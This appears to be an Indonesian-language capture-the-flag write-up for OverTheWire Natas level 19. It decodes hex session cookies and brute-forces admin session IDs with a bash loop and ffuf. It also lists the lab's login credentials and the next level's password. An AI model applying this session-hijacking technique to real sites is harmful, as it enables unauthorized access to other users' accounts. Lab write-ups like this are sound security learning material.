soal

Username: natas19 URL: http://natas19.natas.labs.overthewire.org

solve

login with cred http://natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr@natas19.natas.labs.overthewire.org
terdapat informasi seperti ini

This page uses mostly the same code as the previous level, but session IDs are no longer sequential...

- aku mencoba login dan melihat perbedaan hasil cookie

3238382d74727565 admin:admin 3439302d6e617461733139 natas19:natas19

- jika diubah jadi hex:

3238382d74727565 → 288-true 3439302d6e617461733139 → 490-natas19

- jadi kita bisa coba brute dengna format seperti ini <ID>-<username>
```bash
for i in $(seq 1 640); do
  # ubah "i-admin" ke hex
  echo -n "${i}-admin" | xxd -p
done > /tmp/ids_admin_hex.txt

lakukan fuzzing

ffuf -u http://natas19:tnwER7PdfWkxsG4FNWUtoAZ9VyZTJqJr@natas19.natas.labs.overthewire.org -H "Cookie: PHPSESSID=FUZZ" -w /tmp/ids_admin_hex.txt -fr "You are logged in as a regular user"

outputnya: 3238312d61646d696e

lalu copy paste cookie nya dan akhirnya mendapatkan password level selanjutnya

You are an admin. The credentials for the next level are:
Username: natas20
Password: p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

flag

p5mCvP7GS2K6Bmt3gqhM2Fc1A5T8MVyw

Level 19

soal

solve

flag

On this page